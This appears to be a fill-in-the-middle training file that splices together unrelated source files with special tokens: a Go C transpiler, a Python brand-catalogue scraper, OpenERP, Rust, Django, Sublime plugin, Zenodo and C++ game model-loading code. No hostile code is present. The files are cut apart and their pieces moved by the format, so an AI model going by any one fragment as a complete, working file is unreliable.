return nil, "", nil, nil, fmt.Errorf("Expr is nil")
}
preStmts, postStmts =
combinePreAndPostStmts(preStmts, postStmts, newPre, newPost)
return
}
}
if operator == token.NEQ || operator == token.EQL ||
operator == token.LSS || operator == token.GTR ||
operator == token.LEQ || operator == token.GEQ ||
operator == token.AND || operator == token.ADD ||
operator == token.SUB || operator == token.MUL ||
operator == token.QUO || operator == token.REM {
// We may have to cast the right side to the same type as the left
// side. This is a bit crude because we should make a better
// decision of which type to cast to instead of only using the type
// of the left side.
if rightType != types.NullPointer {
right, err = types.CastExpr(p, right, rightType, leftType)
rightType = leftType
p.AddMessage(p.GenerateWarningOrErrorMessage(err, n, right == nil))
}
}
if operator == token.ASSIGN {
// Memory allocation is translated into the Go-style.
allocSize := getAllocationSizeNode(p, n.Children()[1])
if allocSize != nil {
right, newPre, newPost, err = generateAlloc(p, allocSize, leftType)
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
return nil, "", nil, nil, err
}
preStmts, postStmts = combinePreAndPostStmts(preStmts, postStmts, newPre, newPost)
} else {
right, err = types.CastExpr(p, right, rightType, returnType)
if p.AddMessage(p.GenerateWarningMessage(err, n)) && right == nil {
right = util.NewNil()
}
}
}
if operator == token.ADD_ASSIGN || operator == token.SUB_ASSIGN {
right, err = types.CastExpr(p, right, rightType, returnType)
}
var resolvedLeftType = n.Type
if !types.IsFunction(n.Type) && !types.IsTypedefFunction(p, n.Type) {
resolvedLeftType, err = types.ResolveType(p, leftType)
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
}
// Enum casting
if operator != token.ASSIGN && strings.Contains(leftType, "enum") {
left, err = types.CastExpr(p, left, leftType, "int")
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
}
// Enum casting
if operator != token.ASSIGN && strings.Contains(rightType, "enum") {
right, err = types.CastExpr(p, right, rightType, "int")
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
}
if left == nil {
err = fmt.Errorf("left part of binary operation is nil. left : %#v", n.Children()[0])
p.AddMessage(p.GenerateWarningMessage(err, n))
return nil, "", nil, nil, err
}
if right == nil {
err = fmt.Errorf("right part of binary operation is nil. right : %#v", n.Children()[1])
p.AddMessage(p.GenerateWarningMessage(err, n))
return nil, "", nil, nil, err
}
if adjustPointerDiff > 0 {
expr := util.NewBinaryExpr(left, operator, right, resolvedLeftType, exprIsStmt)
returnType = types.ResolveTypeForBinaryOperator(p, n.Operator, leftType, rightType)
return util.NewBinaryExpr(expr, token.QUO, util.NewIntLit(adjustPointerDiff), returnType, exprIsStmt),
returnType,
preStmts, postStmts, nil
}
return util.NewBinaryExpr(left, operator, right, resolvedLeftType, exprIsStmt),
types.ResolveTypeForBinaryOperator(p, n.Operator, leftType, rightType),
preStmts, postStmts, nil
}
func foundCallExpr(n ast.Node) *ast.CallExpr {
switch v := n.(type) {
case *ast.ImplicitCastExpr, *ast.CStyleCastExpr:
return foundCallExpr(n.Children()[0])
case *ast.CallExpr:
return v
}
return nil
}
// getAllocationSizeNode returns the node that, if evaluated, would return the
// size (in bytes) of a memory allocation operation. For example:
//
// (int *)malloc(sizeof(int))
//
// Would return the node that represents the "sizeof(int)".
//
// If the node does not represent an allocation operation (such as calling
// malloc, calloc, realloc, etc.) then nil is returned.
//
// In the case of calloc() it will return a new BinaryExpr that multiplies both
// arguments.
func getAllocationSizeNode(p *program.Program, node ast.Node) ast.Node {
expr := foundCallExpr(node)
if expr == nil || expr == (*ast.CallExpr)(nil) {
return nil
}
functionName, _ := getNameOfFunctionFromCallExpr(p, expr)
if functionName == "malloc" {
// Is 1 always the body in this case? Might need to be more careful
// to find the correct node.
return expr.Children()[1]
}
if functionName == "calloc" {
return &ast.BinaryOperator{
Type: "int",
Operator: "*",
ChildNodes: expr.Children()[1:],
}
}
// TODO: realloc() is not supported
// https://github.com/elliotchance/c2go/issues/118
//
// Realloc will be treated as calloc which will almost certainly cause
// bugs in your code.
if functionName == "realloc" {
return expr.Children()[2]
}
return nil
}
func generateAlloc(p *program.Program, allocSize ast.Node, leftType string) (
right goast.Expr, preStmts []goast.Stmt, postStmts []goast.Stmt, err error) {
allocSizeExpr, allocType, newPre, newPost, err := transpileToExpr(allocSize, p, false)
preStmts, postStmts = combinePreAndPostStmts(preStmts, postStmts, newPre, newPost)
if err != nil {
return nil, preStmts, postStmts, err
}
toType, err := types.ResolveType(p, leftType)
if err != nil {
return nil, preStmts, postStmts, err
}
allocSizeExpr, err = types.CastExpr(p, allocSizeExpr, allocType, "int")
if err != nil {
return nil, preStmts, postStmts, err
}
right = util.NewCallExpr(
"noarch.Malloc",
allocSizeExpr,
)
if toType != "unsafe.Pointer" {
right = &goast.CallExpr{
Fun: &goast.ParenExpr{
X: util.NewTypeIdent(toType),
},
Args: []goast.Expr{right},
}
}
return
}<|fim▁end|> | // then solution is:
// c = 1, b = c, a = b |
<|file_name|>brand1.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib
import urllib2
import re
import json
class Spider:
def __init__(self):
self.url = 'http://brand.efu.com.cn/'
self.user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'
self.headers = { 'User-Agent' : self.user_agent }
def getBrandCategory(self):
f = open('brand1.csv','a')
f.write('品牌,目标消费群体,分类\n')
f.close()
content = self.getPageContext(self.url)
items = self.resolveIndexContent(content)
for line in items:
context = [line[0]]
# 循环遍历每一个分类下的页码
url = line[1]
for num in range(1,1000):
nexturl = self.url+url[:-6]+str(num)+".html" # 拼接每一页的url
pageContent = self.getPageContext(nexturl) # 爬取分页的内容
# 判断此页是否有内容
if pageContent.find('<div class="lstPhotob">') == -1:
break
# 处理分页页面内容
pageItems = self.resolvePageContent(pageContent,context[0])
if len(pageItems) == 0:
break
for pageLine in pageItems:
# print pageLine[0]
# print pageLine[1]
brandContent = self.getPageContext(pageLine[0])
brandItems = self.resolveBrandContext(brandContent)<|fim▁hole|> if len(brandItems) == 0:
break
f = open('brand1.csv','a')
for brandLine in brandItems:
if brandLine[0] == '目标消费群体':
output = str(pageLine[1])+","+str(brandLine[1])+","+str(line[0])
print output
f.write(output)
f.write("\n")
break
f.close()
def resolveBrandContext(self,content):
# [\s\S]+?
try:
pattern = re.compile('.*?<span class="sp-a">(.*?)</span>.*?<span class="sp-b">(.*?)</span>.*?')
return re.findall(pattern,content)
except:
# print '忽略解析品牌页面出错问题'
return []
def resolveIndexContent(self,content):
try:
pattern = re.compile('.*?<li><a title="(.*?)" href="(.*?)">.*?</a></li>.*?')
return re.findall(pattern,content)
except:
# print '忽略解析首页出错问题'
return []
def resolvePageContent(self,content,category):
# pattern = re.compile('.*?<div class="lstPhotob"><div class="lstPa"><div class="lstPa-a"><a href="(.*?)" target="_blank" title="(.*?)>.*?')
try:
pattern = re.compile('.*?<a href="(.*?)" target="_blank" title="(.*?)'+category+'品牌">.*?')
return re.findall(pattern,content)
except:
# print '忽略解析分页页面出错问题'
return []
def getPageContext(self,url):
# print '爬取页面',url
try:
request = urllib2.Request(url,headers = self.headers)
response = urllib2.urlopen(request)
return response.read()
except:
1
# print '忽略url发送出错问题'
def run(self):
self.getBrandCategory()
spider = Spider()
spider.run()<|fim▁end|> | |
<|file_name|>product.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
#
# Copyright (c) 2012 Vauxoo - http://www.vauxoo.com
# All Rights Reserved.
# [email protected]
############################################################################
# Coded by: Rodo ([email protected]),Moy ([email protected])
############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
from openerp.tools.translate import _
class product_product(orm.Model):
_inherit = "product.product"
_columns = {
'product_customer_code_ids': fields.one2many('product.customer.code',
'product_id',
'Customer Codes'),
}
def copy(self, cr, uid, id, default=None, context=None):
if not default:
default = {}
default['product_customer_code_ids'] = False<|fim▁hole|> return res
def name_search(self, cr, user, name='', args=None, operator='ilike',
context=None, limit=80):
res = super(product_product, self).name_search(
cr, user, name, args, operator, context, limit)
if not context:
context = {}
product_customer_code_obj = self.pool.get('product.customer.code')
if not res:
ids = []
partner_id = context.get('partner_id', False)
if partner_id:
id_prod_code = \
product_customer_code_obj.search(cr, user,
[('product_code',
'=', name),
('partner_id', '=',
partner_id)],
limit=limit,
context=context)
# TODO: Search for product customer name
id_prod = id_prod_code and product_customer_code_obj.browse(
cr, user, id_prod_code, context=context) or []
for ppu in id_prod:
ids.append(ppu.product_id.id)
if ids:
res = self.name_get(cr, user, ids, context)
return res<|fim▁end|> | res = super(product_product, self).copy(
cr, uid, id, default=default, context=context) |
<|file_name|>lib.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
#![feature(box_syntax)]
#![feature(iter_cmp)]
#![feature(slice_bytes)]
#![feature(vec_push_all)]
#![feature(plugin)]
#![plugin(plugins)]
#![deny(unsafe_code)]
#[macro_use]
extern crate log;
#[macro_use]
extern crate profile_traits;
#[macro_use]
extern crate util;
extern crate azure;
extern crate canvas;
extern crate canvas_traits;
extern crate clipboard;
#[cfg(target_os = "macos")]
extern crate core_graphics;
#[cfg(target_os = "macos")]
extern crate core_text;
extern crate devtools_traits;
extern crate euclid;
extern crate gfx;
extern crate gfx_traits;
extern crate gleam;
extern crate ipc_channel;
extern crate layers;
extern crate layout_traits;
extern crate msg;<|fim▁hole|>extern crate png;
extern crate script_traits;
extern crate style_traits;
extern crate time;
extern crate url;
pub use compositor_task::{CompositorEventListener, CompositorProxy, CompositorTask};
pub use constellation::Constellation;
mod compositor;
mod compositor_layer;
mod headless;
mod scrolling;
mod surface_map;
pub mod compositor_task;
pub mod constellation;
pub mod pipeline;
pub mod windowing;<|fim▁end|> | extern crate net_traits;
extern crate num;
extern crate offscreen_gl_context; |
<|file_name|>0004_groupround_schedule_is_set.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-06 02:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('season', '0003_auto_20161206_0216'),
]
operations = [
migrations.AddField(
model_name='groupround',
name='schedule_is_set',
field=models.BooleanField(default=False),<|fim▁hole|><|fim▁end|> | ),
] |
<|file_name|>package_report.py<|end_file_name|><|fim▁begin|>import sublime
import sublime_plugin
<|fim▁hole|>from ..core import oa_syntax, decorate_pkg_name
from ..core import ReportGenerationThread
from ...lib.packages import PackageList
###----------------------------------------------------------------------------
class PackageReportThread(ReportGenerationThread):
"""
Generate a tabular report of all installed packages and their state.
"""
def _process(self):
pkg_list = PackageList()
pkg_counts = pkg_list.package_counts()
title = "{} Total Packages".format(len(pkg_list))
t_sep = "=" * len(title)
fmt = '{{:>{}}}'.format(len(str(max(pkg_counts))))
stats = ("{0} [S]hipped with Sublime\n"
"{0} [I]nstalled (user) sublime-package files\n"
"{0} [U]npacked in Packages\\ directory\n"
"{0} Currently in ignored_packages\n"
"{0} Installed Dependencies\n").format(fmt).format(*pkg_counts)
row = "| {:<40} | {:3} | {:3} | {:<3} |".format("", "", "", "")
r_sep = "+------------------------------------------+-----+-----+-----+"
packages = {}
result = [title, t_sep, "", self._generation_time(), stats, r_sep]
for pkg_name, pkg_info in pkg_list:
packages[pkg_name] = pkg_info.status(detailed=False)
result.append(
"| {:<40} | [{:1}] | [{:1}] | [{:1}] |".format(
decorate_pkg_name(pkg_info, name_only=True),
"S" if pkg_info.shipped_path is not None else " ",
"I" if pkg_info.installed_path is not None else " ",
"U" if pkg_info.unpacked_path is not None else " "))
result.extend([r_sep, ""])
self._set_content("OverrideAudit: Package Report", result, ":packages",
oa_syntax("OA-PkgReport"), {
"override_audit_report_packages": packages,
"context_menu": "OverrideAuditReport.sublime-menu"
})
###----------------------------------------------------------------------------
class OverrideAuditPackageReportCommand(sublime_plugin.WindowCommand):
"""
Generate a tabular report of all installed packages and their state.
"""
def run(self, force_reuse=False):
PackageReportThread(self.window, "Generating Package Report",
self.window.active_view(),
force_reuse=force_reuse).start()
###----------------------------------------------------------------------------
#<|fim▁end|> | |
<|file_name|>views.py<|end_file_name|><|fim▁begin|>from django.shortcuts import render
# Create your views here.
def proindex(request):
return render(request, 'example/probase.html' )
def index(request):
return render(request, 'e_index.html' )
def badges_labels(request):
return render(request, 'badges_labels.html' )
def four(request):
return render(request, '404.html' )
def five(request):
return render(request, '500.html' )
def basic_gallery(request):
return render(request, 'basic_gallery.html' )
def buttons(request):
return render(request, 'buttons.html' )
def calendar(request):
return render(request, 'calendar.html' )
def carousel(request):
return render(request, 'carousel.html' )
def chat_view(request):
return render(request, 'chat_view.html' )
def code_editor(request):
return render(request, 'code_editor.html' )
def contacts(request):
return render(request, 'contacts.html' )
def css_animation(request):
return render(request, 'css_animation.html' )
def draggable_panels(request):
return render(request, 'draggable_panels.html' )
def empty_page(request):
return render(request, 'empty_page.html' )
def faq(request):
return render(request, 'faq.html' )
def file_manager(request):
return render(request, 'file_manager.html' )
def form_advanced(request):
return render(request, 'form_advanced.html' )
def form_avatar(request):
return render(request, 'form_avatar.html' )
def form_basic(request):
return render(request, 'form_basic.html' )
def form_builder(request):
return render(request, 'form_builder.html' )
def form_editors(request):
return render(request, 'form_editors.html' )
def form_file_upload(request):
return render(request, 'form_file_upload.html' )
def form_markdown(request):
return render(request, 'form_markdown.html' )
def form_simditor(request):
return render(request, 'form_simditor.html' )
def form_validate(request):
return render(request, 'form_validate.html' )
def form_webuploader(request):
return render(request, 'form_webuploader.html' )
def form_wizard(request):
return render(request, 'form_wizard.html' )
def forum_main(request):
return render(request, 'forum_main.html' )
def graph_echarts(request):
return render(request, 'graph_echarts.html' )
def graph_flot(request):
return render(request, 'graph_flot.html' )
def graph_morris(request):
return render(request, 'graph_morris.html' )<|fim▁hole|>
return render(request, 'graph_peity.html' )
def graph_rickshaw(request):
return render(request, 'graph_rickshaw.html' )
def graph_sparkline(request):
return render(request, 'graph_sparkline.html' )
def grid_options(request):
return render(request, 'grid_options.html' )
def iconfont(request):
return render(request, 'iconfont.html' )
def icons(request):
return render(request, 'icons.html' )
def index_1(request):
return render(request, 'index_1.html' )
def index_2(request):
return render(request, 'index_2.html' )
def index_3(request):
return render(request, 'index_3.html' )
def index_4(request):
return render(request, 'index_4.html' )
def invoice(request):
return render(request, 'invoice.html' )
def invoice_print(request):
return render(request, 'invoice_print.html' )
def layer(request):
return render(request, 'layer.html' )
def layerdate(request):
return render(request, 'layerdate.html' )
def layouts(request):
return render(request, 'layouts.html' )
def lockscreen(request):
return render(request, 'lockscreen.html' )
def login(request):
return render(request, 'login.html' )
def mailbox(request):
return render(request, 'mailbox.html' )
def mail_compose(request):
return render(request, 'mail_compose.html' )
def mail_detail(request):
return render(request, 'mail_detail.html' )
def modal_window(request):
return render(request, 'modal_window.html' )
def nestable_list(request):
return render(request, 'nestable_list.html' )
def notifications(request):
return render(request, 'notifications.html' )
def pin_board(request):
return render(request, 'pin_board.html' )
def profile(request):
return render(request, 'profile.html' )
def projects(request):
return render(request, 'projects.html' )
def project_detail(request):
return render(request, 'project_detail.html' )
def register(request):
return render(request, 'register.html' )
def search_results(request):
return render(request, 'search_results.html' )
def table_basic(request):
return render(request, 'table_basic.html' )
def table_data_tables(request):
return render(request, 'table_data_tables.html' )
def table_jqgrid(request):
return render(request, 'table_jqgrid.html' )
def tabs_panels(request):
return render(request, 'tabs_panels.html' )
def timeline(request):
return render(request, 'timeline.html' )
def timeline_v2(request):
return render(request, 'timeline_v2.html' )
def toastr_notifications(request):
return render(request, 'toastr_notifications.html' )
def tree_view(request):
return render(request, 'tree_view.html' )
def tree_view_v2(request):
return render(request, 'tree_view_v2.html' )
def typography(request):
return render(request, 'typography.html' )
def validation(request):
return render(request, 'validation.html' )
def webim(request):
return render(request, 'webim.html' )
def widgets(request):
return render(request, 'widgets.html' )<|fim▁end|> |
def graph_peity(request): |
<|file_name|>config.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
# This file is part of Zenodo.
# Copyright (C) 2015 CERN.
#
# Zenodo is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Zenodo is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Zenodo; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Configuration for Zenodo Records."""
from __future__ import absolute_import, print_function
from flask_babelex import gettext
from speaklater import make_lazy_gettext
_ = make_lazy_gettext(lambda: gettext)
ZENODO_COMMUNITIES_AUTO_ENABLED = True
"""Automatically add and request to communities upon publishing."""
ZENODO_COMMUNITIES_AUTO_REQUEST = ['zenodo', ]
"""Communities which are to be auto-requested upon first publishing."""<|fim▁hole|>"""Communities which are to be auto-requested if record has grants."""
ZENODO_COMMUNITIES_ADD_IF_GRANTS = []
"""Communities which are to be auto-added if record has grants."""
ZENODO_BUCKET_QUOTA_SIZE = 50 * 1000 * 1000 * 1000 # 50 GB
"""Maximum quota per bucket."""
ZENODO_MAX_FILE_SIZE = ZENODO_BUCKET_QUOTA_SIZE
"""Maximum file size accepted."""<|fim▁end|> |
ZENODO_COMMUNITIES_REQUEST_IF_GRANTS = ['ecfunded', ] |
<|file_name|>r_model_alias.cpp<|end_file_name|><|fim▁begin|>/**
* @file
* @brief shared alias model loading code (md2, md3)
*/
/*
Copyright (C) 1997-2001 Id Software, Inc.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License<|fim▁hole|>
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*/
#include "r_local.h"
#include "../../shared/parse.h"
#include "r_state.h"
/*
==============================================================================
ALIAS MODELS
==============================================================================
*/
void R_ModLoadAnims (mAliasModel_t *mod, const char *animname)
{
const char *text, *token;
mAliasAnim_t *anim;
int n;
/* load the tags */
byte *animbuf = NULL;
const char *buffer;
FS_LoadFile(animname, &animbuf);
buffer = (const char *)animbuf;
/* count the animations */
n = Com_CountTokensInBuffer(buffer);
if ((n % 4) != 0) {
FS_FreeFile(animbuf);
Com_Error(ERR_DROP, "invalid syntax: %s", animname);
}
/* each animation definition is made out of 4 tokens */
n /= 4;
if (n > MAX_ANIMS)
n = MAX_ANIMS;
mod->animdata = Mem_PoolAllocTypeN(mAliasAnim_t, n, vid_modelPool);
anim = mod->animdata;
text = buffer;
mod->num_anims = 0;
do {
/* get the name */
token = Com_Parse(&text);
if (!text)
break;
Q_strncpyz(anim->name, token, sizeof(anim->name));
/* get the start */
token = Com_Parse(&text);
if (!text)
break;
anim->from = atoi(token);
if (anim->from < 0)
Com_Error(ERR_FATAL, "R_ModLoadAnims: negative start frame for %s", animname);
else if (anim->from > mod->num_frames)
Com_Error(ERR_FATAL, "R_ModLoadAnims: start frame is higher than models frame count (%i) (model: %s)",
mod->num_frames, animname);
/* get the end */
token = Com_Parse(&text);
if (!text)
break;
anim->to = atoi(token);
if (anim->to < 0)
Com_Error(ERR_FATAL, "R_ModLoadAnims: negative end frame for %s", animname);
else if (anim->to > mod->num_frames)
Com_Error(ERR_FATAL, "R_ModLoadAnims: end frame is higher than models frame count (%i) (model: %s)",
mod->num_frames, animname);
/* get the fps */
token = Com_Parse(&text);
if (!text)
break;
anim->time = (atof(token) > 0.01) ? (1000.0 / atof(token)) : (1000.0 / 0.01);
/* add it */
mod->num_anims++;
anim++;
} while (mod->num_anims < n);
FS_FreeFile(animbuf);
}
/**
* @brief Calculates a per-vertex tangentspace basis and stores it in GL arrays attached to the mesh
* @param mesh The mesh to calculate normals for
* @param framenum The animation frame to calculate normals for
* @param translate The frame translation for the given animation frame
* @param backlerp Whether to store the results in the GL arrays for the previous keyframe or the next keyframe
* @sa R_ModCalcUniqueNormalsAndTangents
*/
static void R_ModCalcNormalsAndTangents (mAliasMesh_t *mesh, int framenum, const vec3_t translate, bool backlerp)
{
int i, j;
mAliasVertex_t *vertexes = &mesh->vertexes[framenum * mesh->num_verts];
mAliasCoord_t *stcoords = mesh->stcoords;
const int numIndexes = mesh->num_tris * 3;
const int32_t *indexArray = mesh->indexes;
vec3_t triangleNormals[MAX_ALIAS_TRIS];
vec3_t triangleTangents[MAX_ALIAS_TRIS];
vec3_t triangleBitangents[MAX_ALIAS_TRIS];
float *texcoords, *verts, *normals, *tangents;
/* set up array pointers for either the previous keyframe or the next keyframe */
texcoords = mesh->texcoords;
if (backlerp) {
verts = mesh->verts;
normals = mesh->normals;
tangents = mesh->tangents;
} else {
verts = mesh->next_verts;
normals = mesh->next_normals;
tangents = mesh->next_tangents;
}
/* calculate per-triangle surface normals and tangents*/
for (i = 0, j = 0; i < numIndexes; i += 3, j++) {
vec3_t dir1, dir2;
vec2_t dir1uv, dir2uv;
/* calculate two mostly perpendicular edge directions */
VectorSubtract(vertexes[indexArray[i + 0]].point, vertexes[indexArray[i + 1]].point, dir1);
VectorSubtract(vertexes[indexArray[i + 2]].point, vertexes[indexArray[i + 1]].point, dir2);
Vector2Subtract(stcoords[indexArray[i + 0]], stcoords[indexArray[i + 1]], dir1uv);
Vector2Subtract(stcoords[indexArray[i + 2]], stcoords[indexArray[i + 1]], dir2uv);
/* we have two edge directions, we can calculate a third vector from
* them, which is the direction of the surface normal */
CrossProduct(dir1, dir2, triangleNormals[j]);
/* normalize */
VectorNormalizeFast(triangleNormals[j]);
/* then we use the texture coordinates to calculate a tangent space */
if ((dir1uv[1] * dir2uv[0] - dir1uv[0] * dir2uv[1]) != 0.0) {
const float frac = 1.0 / (dir1uv[1] * dir2uv[0] - dir1uv[0] * dir2uv[1]);
vec3_t tmp1, tmp2;
/* calculate tangent */
VectorMul(-1.0 * dir2uv[1] * frac, dir1, tmp1);
VectorMul(dir1uv[1] * frac, dir2, tmp2);
VectorAdd(tmp1, tmp2, triangleTangents[j]);
/* calculate bitangent */
VectorMul(-1.0 * dir2uv[0] * frac, dir1, tmp1);
VectorMul(dir1uv[0] * frac, dir2, tmp2);
VectorAdd(tmp1, tmp2, triangleBitangents[j]);
/* normalize */
VectorNormalizeFast(triangleTangents[j]);
VectorNormalizeFast(triangleBitangents[j]);
} else {
VectorClear(triangleTangents[j]);
VectorClear(triangleBitangents[j]);
}
}
/* for each vertex */
for (i = 0; i < mesh->num_verts; i++) {
vec3_t n, b, v;
vec4_t t;
const int len = mesh->revIndexes[i].length;
const int32_t *list = mesh->revIndexes[i].list;
VectorClear(n);
VectorClear(t);
VectorClear(b);
/* for each vertex that got mapped to this one (ie. for each triangle this vertex is a part of) */
for (j = 0; j < len; j++) {
const int32_t idx = list[j] / 3;
VectorAdd(n, triangleNormals[idx], n);
VectorAdd(t, triangleTangents[idx], t);
VectorAdd(b, triangleBitangents[idx], b);
}
/* normalization here does shared-vertex smoothing */
VectorNormalizeFast(n);
VectorNormalizeFast(t);
VectorNormalizeFast(b);
/* Grahm-Schmidt orthogonalization */
Orthogonalize(t, n);
/* calculate handedness */
CrossProduct(n, t, v);
t[3] = (DotProduct(v, b) < 0.0) ? -1.0 : 1.0;
/* copy this vertex's info to all the right places in the arrays */
for (j = 0; j < len; j++) {
const int32_t idx = list[j];
const int meshIndex = mesh->indexes[list[j]];
Vector2Copy(stcoords[meshIndex], (texcoords + (2 * idx)));
VectorAdd(vertexes[meshIndex].point, translate, (verts + (3 * idx)));
VectorCopy(n, (normals + (3 * idx)));
Vector4Copy(t, (tangents + (4 * idx)));
}
}
}
/**
* @brief Tries to load a mdx file that contains the normals and the tangents for a model.
* @sa R_ModCalcNormalsAndTangents
* @sa R_ModCalcUniqueNormalsAndTangents
* @param mod The model to load the mdx file for
*/
bool R_ModLoadMDX (model_t *mod)
{
int i;
for (i = 0; i < mod->alias.num_meshes; i++) {
mAliasMesh_t *mesh = &mod->alias.meshes[i];
char mdxFileName[MAX_QPATH];
byte *buffer = NULL, *buf;
const int32_t *intbuf;
uint32_t version;
int sharedTris[MAX_ALIAS_VERTS];
Com_StripExtension(mod->name, mdxFileName, sizeof(mdxFileName));
Com_DefaultExtension(mdxFileName, sizeof(mdxFileName), ".mdx");
if (FS_LoadFile(mdxFileName, &buffer) == -1)
return false;
buf = buffer;
if (strncmp((const char *) buf, IDMDXHEADER, strlen(IDMDXHEADER))) {
FS_FreeFile(buf);
Com_Error(ERR_DROP, "No mdx file buffer given");
}
buffer += strlen(IDMDXHEADER) * sizeof(char);
version = LittleLong(*(uint32_t*) buffer);
if (version != MDX_VERSION) {
FS_FreeFile(buf);
Com_Error(ERR_DROP, "Invalid version of the mdx file, expected %i, found %i",
MDX_VERSION, version);
}
buffer += sizeof(uint32_t);
intbuf = (const int32_t *) buffer;
mesh->num_verts = LittleLong(*intbuf);
if (mesh->num_verts <= 0 || mesh->num_verts > MAX_ALIAS_VERTS) {
FS_FreeFile(buf);
Com_Error(ERR_DROP, "mdx file for %s has to many (or no) vertices: %i", mod->name, mesh->num_verts);
}
intbuf++;
mesh->num_indexes = LittleLong(*intbuf);
intbuf++;
mesh->indexes = Mem_PoolAllocTypeN(int32_t, mesh->num_indexes, vid_modelPool);
mesh->revIndexes = Mem_PoolAllocTypeN(mIndexList_t, mesh->num_verts, vid_modelPool);
mesh->vertexes = Mem_PoolAllocTypeN(mAliasVertex_t, mesh->num_verts * mod->alias.num_frames, vid_modelPool);
/* load index that maps triangle verts to Vertex objects */
for (i = 0; i < mesh->num_indexes; i++) {
mesh->indexes[i] = LittleLong(*intbuf);
intbuf++;
}
for (i = 0; i < mesh->num_verts; i++)
sharedTris[i] = 0;
/* set up reverse-index that maps Vertex objects to a list of triangle verts */
for (i = 0; i < mesh->num_indexes; i++)
sharedTris[mesh->indexes[i]]++;
for (i = 0; i < mesh->num_verts; i++) {
mesh->revIndexes[i].length = 0;
mesh->revIndexes[i].list = Mem_PoolAllocTypeN(int32_t, sharedTris[i], vid_modelPool);
}
for (i = 0; i < mesh->num_indexes; i++)
mesh->revIndexes[mesh->indexes[i]].list[mesh->revIndexes[mesh->indexes[i]].length++] = i;
FS_FreeFile(buf);
}
return true;
}
/**
* @brief Calculates normals and tangents for all frames and does vertex merging based on smoothness
* @param mesh The mesh to calculate normals for
* @param nFrames How many frames the mesh has
* @param smoothness How aggressively should normals be smoothed; value is compared with dotproduct of vectors to decide if they should be merged
* @sa R_ModCalcNormalsAndTangents
*/
void R_ModCalcUniqueNormalsAndTangents (mAliasMesh_t *mesh, int nFrames, float smoothness)
{
int i, j;
vec3_t triangleNormals[MAX_ALIAS_TRIS];
vec3_t triangleTangents[MAX_ALIAS_TRIS];
vec3_t triangleBitangents[MAX_ALIAS_TRIS];
const mAliasVertex_t *vertexes = mesh->vertexes;
mAliasCoord_t *stcoords = mesh->stcoords;
mAliasComplexVertex_t tmpVertexes[MAX_ALIAS_VERTS];
vec3_t tmpBitangents[MAX_ALIAS_VERTS];
const int numIndexes = mesh->num_tris * 3;
const int32_t *indexArray = mesh->indexes;
int indRemap[MAX_ALIAS_VERTS];
int sharedTris[MAX_ALIAS_VERTS];
int numVerts = 0;
if (numIndexes >= MAX_ALIAS_VERTS)
Com_Error(ERR_DROP, "model %s has too many tris", mesh->name);
int32_t* const newIndexArray = Mem_PoolAllocTypeN(int32_t, numIndexes, vid_modelPool);
/* calculate per-triangle surface normals */
for (i = 0, j = 0; i < numIndexes; i += 3, j++) {
vec3_t dir1, dir2;
vec2_t dir1uv, dir2uv;
/* calculate two mostly perpendicular edge directions */
VectorSubtract(vertexes[indexArray[i + 0]].point, vertexes[indexArray[i + 1]].point, dir1);
VectorSubtract(vertexes[indexArray[i + 2]].point, vertexes[indexArray[i + 1]].point, dir2);
Vector2Subtract(stcoords[indexArray[i + 0]], stcoords[indexArray[i + 1]], dir1uv);
Vector2Subtract(stcoords[indexArray[i + 2]], stcoords[indexArray[i + 1]], dir2uv);
/* we have two edge directions, we can calculate a third vector from
* them, which is the direction of the surface normal */
CrossProduct(dir1, dir2, triangleNormals[j]);
/* then we use the texture coordinates to calculate a tangent space */
if ((dir1uv[1] * dir2uv[0] - dir1uv[0] * dir2uv[1]) != 0.0) {
const float frac = 1.0 / (dir1uv[1] * dir2uv[0] - dir1uv[0] * dir2uv[1]);
vec3_t tmp1, tmp2;
/* calculate tangent */
VectorMul(-1.0 * dir2uv[1] * frac, dir1, tmp1);
VectorMul(dir1uv[1] * frac, dir2, tmp2);
VectorAdd(tmp1, tmp2, triangleTangents[j]);
/* calculate bitangent */
VectorMul(-1.0 * dir2uv[0] * frac, dir1, tmp1);
